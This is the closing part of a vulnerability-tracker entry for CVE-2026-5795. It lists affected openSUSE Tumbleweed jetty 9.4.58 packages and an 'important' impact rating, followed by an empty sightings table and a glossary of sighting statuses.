"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-5795"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.